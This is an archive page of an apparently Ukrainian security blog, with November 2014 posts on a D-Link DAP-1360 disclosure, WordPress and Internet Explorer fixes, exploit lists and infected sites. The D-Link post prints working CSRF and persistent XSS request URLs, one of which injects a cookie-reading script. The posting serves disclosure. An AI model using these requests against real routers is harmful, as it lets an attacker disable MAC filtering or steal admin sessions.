Архів за Листопад, 2014

CSRF та XSS уразливості в D-Link DAP-1360

23:52 26.11.2014

21.06.2014

Продовжуючи тему уразливостей в D-Link DAP-1360. У квітні, 30.04.2014, я виявив уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router). Це Cross-Site Request Forgery та Cross-Site Scripting уразливості.

Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

26.11.2014

CSRF (WASC-09):

В розділі Wi-Fi - MAC filter - Filter mode можна змінити параметр MAC filter restrict mode:

Disabled:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:0}]}

Allow:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:1}]}

Deny:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:2}]}

В розділі Wi-Fi - MAC filter - MAC addresses можна додавати і видаляти MAC адреси:

Додати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22]

Видалити:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=44&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22]

XSS (persistent XSS) (WASC-08):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22]

Код спрацює на http://192.168.0.50/index.cgi#wifi/mac.

Нова версія прошивки з виправленням даних уразливостей була розроблена в першій половині листопада. Але вона все ще не вийшла, бо D-Link виявив баги в ній і працює на їх виправленням.

Вийшов WordPress 4.0.1

22:47 26.11.2014

У листопаді, 20.11.2014, вийшла нова версія WordPress 4.0.1.

WordPress 4.0.1 це багфікс та секюріті випуск нової 4.0 серії. В якому розробники виправили 23 баги та 10 уразливостей. Серед виправлених уразливостей:

  • виправлені 3 XSS уразливості, що можуть бути використані користувачами з правами contributor чи author.
  • виправлена Cross-Site Request Forgery уразливість, що дозволяє провести атаку на користувача для зміни пароля.
  • виправлена Denial of Service уразливість при перевірці паролів.
  • доданий додатковий захист проти Server-Side Request Forgery.
  • виправлена дуже маловірогідна колізія хешів, що дозволяла скомпрометувати акаунт користувача.
  • тепер лінки в листах для зміни паролю стають недійсними, якщо користувач змінив свій емайл.
  • виправлені дві уразливості при перевірці EXIF даних при завантаженні зображень, що розробники назвали “security hardening”.

У WordPress 3.9.2 та попередніх версіях виявлена Cross-Site Scripting уразливість в функції коментування. Для гілок 3.7.x, 3.8.x і 3.9.x були випущені версії 3.7.5, 3.8.5 і 3.9.3 з виправленням даної XSS уразливості.

DoS проти Ruby

20:05 26.11.2014

Виявлена моживість проведення DoS атаки проти Ruby.

Уразливі версії: Ruby 2.1.

Вичерпання ресурсів при розборі XML. Пошкодження пам’яті в encodes().

Добірка експлоітів

17:22 26.11.2014

В даній добірці експлоіти в веб додатках:

  • Incredible PBX 11 2.0.6.5.0 Remote Command Execution Vulnerability (деталі)
  • Cisco Ironport WSA telnetd Remote Code Execution Vulnerability (деталі)
  • D-Link DSP-W215 (info.cgi) POST Request Buffer Overflow Exploit (деталі)
  • Flash “Rosetta” JSONP GET/POST Response Disclosure Exploit (деталі)
  • Node Browserify 4.2.0 - Remote Code Execution Vulnerability (деталі)

Уразливості в плагінах для WordPress №162

23:54 25.11.2014

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Photo-Gallery і Formidable Forms та програма Night Lion Security PHP Stress. Для котрих з’явилися експлоіти. Утіліта PHP Stress призначенна для проведення тестування вразливості до DoS атак, Photo-Gallery - це плагін для створення фото галерей, Formidable Forms - це плагін для створення форм.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Моє інтерв’ю для Преса України

22:41 25.11.2014

У листопаді, 17.11.2014, я дав інтерв’ю виданню Преса України. І 20.11.2014 воно було оприлюднене на сайті.

В інтерв’ю розповідається про мою діяльність і про кібер війну Росії проти України. Та про мою громадську ініціативу Українські Кібер Війська, що я створив 09.06.2014.

Информационная война Украинских Кибер Войск

Так що кому буде цікаво прочитати інформацію про мене і УКВ, як тим хто вже читав мої попередні інтерв’ю на ТЕКСТИ.org.ua, в журналі Фокус та інших журналах, так і всім іншим, можете прочитати це інтерв’ю.

Численні уразливості в Microsoft Internet Explorer

20:08 25.11.2014

Виявлені численні уразливості безпеки в Microsoft Internet Explorer.

Уразливі продукти: Microsoft Internet Explorer 6, 7, 8, 9, 10, 11 під Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server, Windows 7, Windows 8, Windows 2012 Server, Windows 8.1.

Витоки інформації та численні пошкодження пам’яті.

  • Microsoft Security Bulletin MS14-065 - Critical Cumulative Security Update for Internet Explorer (3003057) (деталі)

Добірка уразливостей

16:29 25.11.2014

В даній добірці уразливості в веб додатках:

  • HP Application LifeCycle Management, ALM client component, Remote Execution of Arbitrary Code (деталі)
  • php-font-lib 0.3 www/make_subset.php Reflected Cross Site Scripting (деталі)
  • nagios vulnerability (деталі)
  • vulnerabilities in icinga (деталі)
  • polarssl security update (деталі)

Конференція ІТ Форум UA Web Challenge

23:51 24.11.2014

Вчора, 23.11.2014, в Києві відбулася конференція ІТ Форум UA Web Challenge.

Я прийняв участь в конференції та виступив з доповіддю “Кібервійна в Україні”. В якій розповів про кібервійну та Українські Кібер Війська, що я створив для протидії кібервійні.

Моя доповідь:

Кібервійна в Україні

Інфіковані сайти №210

22:15 24.11.2014

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

  • http://profi-oil.com.ua - інфекція була виявлена 24.11.2014. Зараз сайт входить до переліку підозрілих.
  • http://lur.ck.ua - інфекція була виявлена 30.10.2014. Зараз сайт не входить до переліку підозрілих.
  • http://vsvete.com.ua - інфекція була виявлена 23.11.2014. Зараз сайт входить до переліку підозрілих.
  • http://laki-kraski.com.ua - інфекція була виявлена 29.09.2014. Зараз сайт не входить до переліку підозрілих.
  • http://kievmarket.com - інфекція була виявлена 15.11.2014. Зараз сайт не входить до переліку підозрілих.